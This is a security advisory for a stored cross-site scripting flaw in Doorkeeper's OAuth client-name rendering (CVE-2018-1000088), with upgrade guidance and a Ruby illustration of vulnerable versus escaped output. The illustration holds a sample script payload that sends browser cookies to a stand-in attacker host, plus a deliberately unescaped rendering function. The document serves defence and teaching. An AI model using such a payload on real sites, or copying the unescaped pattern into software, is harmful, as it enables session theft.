PT-2018-9267 · Doorkeeper+1
F3Ndot · Published 2018-03-13 · Updated 2025-03-31
CVE-2018-1000088
CVSS v3.1: 6.1 (Medium)
| Vector | AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
Name of the Vulnerable Software and Affected Versions:
Doorkeeper versions 2.1.0 through 4.2.5
Description:
Doorkeeper's OAuth application form and its user authorization prompt (the web view shown when a user is asked to approve a client) render the OAuth client's name without escaping it. This is a stored Cross Site Scripting (XSS) vulnerability: an attacker who can register an OAuth application stores the payload once in the client name, and it executes in the browser of every user who interacts with the affected views. Reaching a victim only requires tricking them into opening a link to the authorization prompt for the malicious client; such a link is virtually indistinguishable from a legitimate authorization link, which is why the CVSS vector records the attack as requiring user interaction (UI:R).
Recommendations:
For versions 2.1.0 through 4.2.5, update to version 4.2.6 or 4.3.0 (or later), which fix the issue.
Until you can upgrade, as a temporary workaround restrict access to the OAuth application form and the user authorization prompt web view (for example, limit who may register OAuth applications).
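As an added illustration (not Doorkeeper's own view code), the following Ruby shows the rendering pattern behind this class of bug: a client-controlled display name interpolated into the authorization prompt's HTML without escaping, beside the escaped rendering that a patched view produces. The template, function names and the sample client name are constructed for this example.

```ruby
require "erb"

# Constructed sample: an attacker-registered OAuth client whose display name
# carries an XSS payload. Illustrative data, not taken from the advisory.
MALICIOUS_CLIENT_NAME =
  %q{Acme <script>document.location='https://attacker.example/?c='+document.cookie</script>}

# A template resembling an authorization prompt. Hypothetical; not Doorkeeper's view.
PROMPT_TEMPLATE = "<p>Authorize <strong>%s</strong> to use your account?</p>"

# Vulnerable rendering: the client-controlled name is placed into the HTML as-is.
# In a Rails view this is what happens when the value is passed through `raw`
# or marked `html_safe` before being output.
def render_prompt_unescaped(client_name)
  format(PROMPT_TEMPLATE, client_name)
end

# Fixed rendering: HTML-escape the name before interpolation, which is what
# Rails' <%= %> does by default for untrusted strings.
def render_prompt_escaped(client_name)
  format(PROMPT_TEMPLATE, ERB::Util.html_escape(client_name))
end

# Crude check usable in a regression test: does the rendered HTML still
# contain an unescaped <script> tag?
def contains_script_tag?(html)
  html.match?(/<script\b/i)
end

if __FILE__ == $PROGRAM_NAME
  puts "unescaped: #{render_prompt_unescaped(MALICIOUS_CLIENT_NAME)}"
  puts "escaped:   #{render_prompt_escaped(MALICIOUS_CLIENT_NAME)}"
end
```

The escaped output keeps the name readable to the user (the browser shows the literal `<script>` text) while the payload never becomes markup; any view that outputs the client name with `raw` or `html_safe` reintroduces the vulnerable form.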
Exploit
Fix
XSS
Weakness Enumeration
Related identifiers
Affected products
Doorkeeper
Ubuntu